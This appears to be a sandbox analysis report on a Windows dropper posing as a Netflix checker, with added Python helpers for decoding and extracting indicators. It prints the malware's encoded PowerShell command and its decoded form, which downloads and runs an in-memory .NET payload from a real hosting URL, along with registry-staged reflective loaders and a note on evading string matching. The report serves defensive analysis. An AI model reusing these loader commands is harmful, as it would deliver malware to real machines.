Analysis
max time kernel: 4s
max time network: 154s
platform: windows7_x64
resource: win7-20220414-en
submitted: 25-05-2022 00:29
Static task: static1
Behavioral task: behavioral1
Sample: a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Resource: win7-20220414-en
General
Target: a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Size: 1.7MB
MD5: 98bfaca19a9ae44bb60fbc3e98e54d09
SHA1: e2f100fc3eb808fe26cdc26327920293c1272cab
SHA256: a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3
SHA512: d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe
Malware Config
Extracted
https://6.top4top.net/p_13529t6r71.jpg
This is the URL that the base64-encoded PowerShell stage (PID 1588 under Processes) fetches with Net.WebClient.DownloadString. Despite the .jpg name the body is expected to be base64 text: the decoded command passes it through [Convert]::FromBase64String straight into AppDomain.Load, so the hosting site serves a .NET assembly, not an image.
Signatures
Executes dropped EXE (1 IoC)
  pid   process
  964   Checker Netflix.exe
Loads dropped DLL (1 IoC)
  pid   process
  880   a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Suspicious use of WriteProcessMemory (20 IoCs)
  The report lists each of the five writer/target pairs below four times ("PID X wrote to memory of Y"). Every target is a process in the same tree, so the entries match the spawn chain shown under Processes; the 1636 -> 1588 pair is the only record of who started the -enc powershell.exe.
  pid   process                                                                   target pid   target process
  880   a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe      964          Checker Netflix.exe
  880   a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe      1516         WScript.exe
  880   a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe      1636         WScript.exe
  880   a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe      1400         WScript.exe
  1636  WScript.exe                                                               1588         powershell.exe
Processes
The tree as the sandbox recorded it; nesting depth is shown by indentation. Image paths are under SysWOW64 even though the command lines say System32 because the dropper is a 32-bit process and WOW64 file-system redirection rewrites its System32 references.

C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
  "C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"
  PID 880 (Loads dropped DLL; Suspicious use of WriteProcessMemory)

  C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
    PID 1400

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
      PID 1508

  C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
    PID 1636 (Suspicious use of WriteProcessMemory)

  C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
    PID 1516

  C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
    "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
    PID 964 (Executes dropped EXE)

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
  PID 1588. The report renders this process at the top level, but the WriteProcessMemory entries record WScript.exe PID 1636 (powershell.js) as the process that started it. The switches are -NoProfile, -Sta and -WindowStyle Hidden (-w 1). The -enc argument is base64 over UTF-16LE text and decodes to:
  [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object Net.WebClient).Downloadstring('https://6.top4top.net/p_13529t6r71.jpg'))).EntryPoint.invoke($null,$null)
  i.e. download the "jpg", base64-decode it into a .NET assembly, load it into the current AppDomain without writing it to disk, and call its entry point.

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
  PID 1772 (top level in the report; no parent is recorded for it)

The two -noexit command lines read a value under HKCU:\Software\<random key> and hand it to [Reflection.Assembly]::Load, so that second stage is staged in the registry rather than as a file. Quoting the member names ('Load', 'EntryPoint', 'Invoke') is legal PowerShell and changes nothing at run time; it only defeats naive string matching on "Assembly]::Load".
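To reproduce the Malware Config extraction from the command lines alone, here is an added Python triage helper. It is not part of the report or of the sample; the command lines are copied from the tree above, and the regex names and the "loader_pids" output are my own. It decodes the -enc argument (base64 over UTF-16LE, not UTF-8), then pulls the download URL, the HKCU key/value pairs used by the two -noexit loaders, and the dropped script paths, and flags every PID whose (decoded) command line loads an assembly reflectively.

```python
import base64
import re

# The -enc argument of PID 1588, copied verbatim from the process tree above (not constructed).
ENC_BLOB = "WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA=="

# Command lines from the report's process tree, keyed by PID (copied, not constructed).
CMDLINES = {
    880: r'"C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"',
    1400: r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"',
    1636: r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"',
    1516: r'"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"',
    964: r'"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"',
    1508: r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)''',
    1588: r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc ' + ENC_BLOB,
    1772: r'''"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)''',
}

# powershell.exe accepts any prefix of -EncodedCommand (-e, -en, -enc, ...) and -ec as well.
_ENC_FLAGS = "|".join(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)])
ENC_RE = re.compile(r"(?i)(?:^|\s)-(?:" + _ENC_FLAGS + r")\s+([A-Za-z0-9+/=]{16,})")
URL_RE = re.compile(r"https?://[^\s'\")]+")
# (Get-ItemProperty HKCU:\...\<key>).<value>  ->  (key, value)
REG_LOADER_RE = re.compile(r"\(Get-ItemProperty\s+(HKCU:\\[^)\s]+)\)\.(\w+)", re.I)
# Both in-memory loaders seen on this page; the optional quotes cover the 'Load' trick.
REFLECTIVE_RE = re.compile(r"\[Reflection\.Assembly\]::'?Load'?|\[AppDomain\]::CurrentDomain\.Load", re.I)
SCRIPT_RE = re.compile(r'"([^"]+\.(?:vbs|vbe|js|jse|wsf))"', re.I)


def decode_encoded_command(b64):
    """-EncodedCommand carries UTF-16LE text, so decoding as UTF-8 would give garbage."""
    return base64.b64decode(b64).decode("utf-16-le")


def expand(cmdline):
    """Return the command line with an -enc payload, if any, replaced by its decoded text."""
    m = ENC_RE.search(cmdline)
    if not m:
        return cmdline
    return cmdline[:m.start(1)] + decode_encoded_command(m.group(1)) + cmdline[m.end(1):]


def extract_iocs(cmdlines):
    """Collect URLs, registry-staged loader locations, dropped scripts and loader PIDs."""
    iocs = {"urls": set(), "registry": set(), "scripts": set(), "loader_pids": set()}
    for pid, raw in cmdlines.items():
        cmd = expand(raw)
        iocs["urls"].update(URL_RE.findall(cmd))
        iocs["registry"].update(REG_LOADER_RE.findall(cmd))
        iocs["scripts"].update(SCRIPT_RE.findall(cmd))
        if REFLECTIVE_RE.search(cmd):
            iocs["loader_pids"].add(pid)
    return iocs


if __name__ == "__main__":
    print("decoded -enc:", decode_encoded_command(ENC_BLOB))
    for kind, values in extract_iocs(CMDLINES).items():
        print(kind, sorted(values, key=str))
```

The same decode-then-match order matters for detection content: a rule that inspects only the raw command line never sees "DownloadString" or "AppDomain" in PID 1588, so telemetry pipelines should expand -enc before pattern matching, as expand() does here.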
Network
MITRE ATT&CK Enterprise v6
Downloads
(path not shown; this entry is listed three times in the report)
  Filesize  1.5MB
  MD5       068068c3cefb4c8d997271897c3173bb
  SHA1      d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
  SHA256    23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
  SHA512    0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (listed twice in the report)
  Filesize  7KB
  MD5       a65c23a0b2c19e4cc65cae332397d73e
  SHA1      fa93da00b09e1c68f771f481d725f01a03913ee6
  SHA256    b96823ee539c570ed2ab01d02aefe7cbd56b31d6ec4379e2971ff6131de5e77a
  SHA512    c71054f895c30d357ce9a636d957235b46ce6afcd7c6bd23ee2ac7aa08d5493b55cfe077553242be06464fbe7eff6113c37ac764f82b5c5a3913ab2c072c1b64

(path not shown)
  Filesize  129KB
  MD5       c78f607c916f060d6ee3bf391e303acc
  SHA1      1575998cda060d4a570ba258abc12044601da283
  SHA256    f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4
  SHA512    cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b

(path not shown)
  Filesize  2KB
  MD5       40b65baa1541784dd92f5aa8ae11b0ef
  SHA1      0772c95f56a025704c01389f2d1108a17fb987cf
  SHA256    9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699
  SHA512    fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2

(path not shown)
  Filesize  87KB
  MD5       0494f414da149631c3d59861865dad37
  SHA1      c9fd335759efb52e58acb974af27cdecb35d0f10
  SHA256    a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56
  SHA512    a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333
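Neither second-stage payload is among the files above: the two -noexit loaders read theirs from a registry value and the -enc stage fetches its from the "jpg" URL. The following added script (not part of the report or of the sample) recovers the blob from either source and checks that it really is a managed PE by looking for a CLR runtime header (data directory 14), which is what [Reflection.Assembly]::Load and AppDomain.Load require. The registry key and value names are the ones on the command lines above; the PE used for the offline demonstration is constructed, and the assumption that the staged value is REG_BINARY (with a base64 REG_SZ fallback) is mine.

```python
import base64
import struct
import sys
import textwrap


def is_dotnet_assembly(blob):
    """True if blob is a PE image whose optional header carries a non-empty CLR runtime
    header (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, index 14)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    if e_lfanew + 26 > len(blob) or blob[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return False
    opt_size = struct.unpack_from("<H", blob, e_lfanew + 20)[0]  # SizeOfOptionalHeader
    opt = e_lfanew + 24                                          # optional header start
    magic = struct.unpack_from("<H", blob, opt)[0]
    dd_base = {0x10B: 96, 0x20B: 112}.get(magic)                # PE32 / PE32+ directory table offset
    if dd_base is None:
        return False
    clr_entry = dd_base + 14 * 8
    if clr_entry + 8 > opt_size or opt + clr_entry + 8 > len(blob):
        return False
    if struct.unpack_from("<I", blob, opt + dd_base - 4)[0] < 15:  # NumberOfRvaAndSizes
        return False
    rva, size = struct.unpack_from("<II", blob, opt + clr_entry)
    return rva != 0 and size != 0


def payload_from_text(text):
    """The 'jpg' body goes through [Convert]::FromBase64String, which ignores whitespace,
    so strip it before decoding."""
    return base64.b64decode("".join(text.split()))


def read_registry_payload(subkey, value_name):
    """Windows only: read a staged blob back from HKCU, e.g.
    ("Software\\vLEwUGUT", "gukeLLVoun") or ("Software\\tsQKDrCBEkat", "evTHJP").
    Assumption: the value is REG_BINARY (a byte[] is what Assembly.Load needs);
    a REG_SZ holding base64 is accepted as a fallback."""
    import winreg  # only available on Windows
    with winreg.OpenKey(winreg.HKEY_CURRENT_USER, subkey) as key:
        data, kind = winreg.QueryValueEx(key, value_name)
    if kind == winreg.REG_BINARY:
        return bytes(data)
    if kind in (winreg.REG_SZ, winreg.REG_EXPAND_SZ):
        return payload_from_text(data)
    raise ValueError("unexpected registry value type %d" % kind)


def build_fake_assembly(clr=True, pe32plus=False):
    """Constructed sample: a minimal, non-runnable PE header with or without a CLR
    directory, standing in for the real payload that this report does not include."""
    dos = bytearray(0x40)
    dos[0:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)          # e_lfanew: PE header right after the DOS header
    dd_base = 112 if pe32plus else 96
    opt = bytearray(dd_base + 16 * 8)
    struct.pack_into("<H", opt, 0, 0x20B if pe32plus else 0x10B)
    struct.pack_into("<I", opt, dd_base - 4, 16)     # NumberOfRvaAndSizes
    if clr:
        struct.pack_into("<II", opt, dd_base + 14 * 8, 0x2008, 72)  # CLR header RVA/size
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, len(opt), 0x102)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


# Constructed stand-in for the downloaded "jpg": base64 text wrapped onto several lines.
SAMPLE_TRANSPORT_TEXT = "\n".join(textwrap.wrap(base64.b64encode(build_fake_assembly()).decode(), 64))


if __name__ == "__main__":
    if sys.platform == "win32":
        for subkey, value in (("Software\\vLEwUGUT", "gukeLLVoun"), ("Software\\tsQKDrCBEkat", "evTHJP")):
            try:
                blob = read_registry_payload(subkey, value)
                print(subkey, value, len(blob), "bytes, .NET PE:", is_dotnet_assembly(blob))
            except OSError as exc:
                print(subkey, value, "not present:", exc)
    else:
        print("offline demo, constructed sample is .NET PE:",
              is_dotnet_assembly(payload_from_text(SAMPLE_TRANSPORT_TEXT)))
```

When the real blob is recovered, write it out with an .dll extension and hand it to a .NET decompiler; the check above only confirms that the bytes are a managed image, it does not say what the assembly does.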